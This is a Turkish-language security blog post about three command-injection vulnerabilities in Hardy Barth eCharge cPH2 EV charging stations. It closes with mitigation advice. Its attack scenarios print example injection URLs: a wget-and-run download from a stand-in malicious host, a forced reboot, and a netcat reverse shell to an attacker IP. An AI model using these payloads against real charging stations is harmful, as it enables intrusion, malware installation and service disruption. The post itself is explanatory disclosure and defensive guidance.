Elektrikli Araç Şarj İstasyonlarında Uzaktan Kod Çalıştırma Tehlikesi
Elektrikli araçlar (EV) dünya genelinde hızla yaygınlaşırken, onları destekleyen altyapının — özellikle de kamusal şarj istasyonlarının — güvenliği hayati önem taşıyor. Ancak Hardy Barth’ın eCharge cPH2 modeline ait şarj istasyonlarında keşfedilen üç kritik güvenlik açığı, bu sistemlerin ne kadar savunmasız olabileceğini gözler önüne seriyor.
CVE-2025-3881, CVE-2025-3882 ve CVE-2025-3883 olarak listelenen bu açıklar sayesinde, kimlik doğrulaması gerekmeden, yerel ağa bağlı bir saldırgan hedef sisteme uzaktan komut çalıştırabiliyor. (Yayınlanma Tarihi: Mayıs 21, 2025)
Zafiyetlerin Özeti
Her üç açık da farklı uç noktaları etkiliyor fakat sonuç aynı: Web sunucusu kullanıcısı (www-data) yetkileriyle uzaktan kod çalıştırma (RCE).
CVE Kimliği | Uç Nokta | Zayıf Parametre | Saldırı Türü | Temel Puan |
---|---|---|---|---|
CVE-2025-3881 | check_req.php |
ntp |
Komut Enjeksiyonu | 8.8 YÜKSEK |
CVE-2025-3882 | nwcheckexec.php |
dest |
Komut Enjeksiyonu | 8.8 YÜKSEK |
CVE-2025-3883 | index.php |
(Açıklanmadı) | Komut Enjeksiyonu | 8.8 YÜKSEK |
Bu güvenlik açıkları, Zero Day Initiative (ZDI) tarafından bildirildi ve ilk olarak ZDI-CAN-23113 ila 23115 olarak tanımlandı.
Gerçekçi Saldırı Senaryoları
1. Alışveriş Merkezinde Drive-by Saldırısı (CVE-2025-3881)
Bir saldırgan, alışveriş merkezinin otoparkındaki şarj istasyonunun bulunduğu Wi-Fi ağına bağlanıyor. Şu isteği gönderiyor:
http://192.168.100.20/check_req.php?ntp=;wget http://kötü-server.com/kötü.sh|sh
Sonuç: Zararlı yazılım istasyona indirilip çalıştırılıyor. Şarj istasyonu artık saldırganın ağına bağlı bir bot haline geliyor.
2. EV Hizmetlerinin Yeniden Başlatılması (CVE-2025-3882)
Saldırgan nwcheckexec.php
uç noktasını kullanarak şunu gönderiyor:
http://192.168.100.20/nwcheckexec.php?dest=;reboot
Sonuç: Şarj istasyonu aniden yeniden başlatılıyor. Kullanıcılar kesintiye uğruyor, hizmet güvenilirliği zedeleniyor.
3. Ters Kabuk Erişimi (CVE-2025-3883)
Gelişmiş bir saldırgan, index.php
dosyasını kullanarak şu kodu enjekte ediyor:
http://192.168.100.20/index.php?cmd=ping;nc -e /bin/sh saldırgan_ip 4444
Sonuç: Saldırgan, şarj istasyonuna tam terminal erişimi elde ediyor. Sisteme sızıyor, kalıcı arka kapılar bırakabiliyor.
Bu Güvenlik Açıkları Neden Önemli?
Bu açıklar yalnızca teorik tehditler değil. Şarj istasyonları çoğunlukla:
- Kritik altyapılara (ör. toplu taşıma, otopark ağları) bağlıdır.
- Halka açık veya yarı-açık ağlar üzerinden erişilebilir durumdadır.
- Kullanıcı bilgileri, faturalama ve cihaz günlükleri gibi verileri içerir.
Bu sistemlere yönelik bir saldırı yalnızca cihazı değil, bağlı bulunduğu tüm ağı ve veri güvenliğini etkileyebilir.
Alınması Gereken Önlemler
Hardy Barth cPH2 serisini kullanıyorsanız, aşağıdaki adımları acilen uygulayın:
- Güncellemeleri Yükleyin: Üretici tarafından yayınlanan en son firmware'i kurun.
- Ağları Ayırın: Şarj cihazlarını izole edilmiş VLAN’larda konumlandırın.
- Web Uygulama Güvenlik Duvarı (WAF) Kullanın: Kötü niyetli GET isteklerini engelleyin.
- Günlükleri Takip Edin: Özellikle
index.php
,check_req.php
venwcheckexec.php
isteklerini izleyin.
Sonuç
Bu komut enjeksiyonu açıkları şunu açıkça ortaya koyuyor:
Geleceğin ulaşımı bugünden güvence altına alınmalıdır.
Bağlantılı cihazların hızla yaygınlaştığı bu dönemde, girdi doğrulama, güçlü kimlik doğrulama ve güvenli dağıtım standart haline gelmelidir.
Altyapınızı zincirin en zayıf halkası haline getirmeyin.
Daha fazla CVE analizi ve uygulamalı siber güvenlik içeriği için beni takip edin.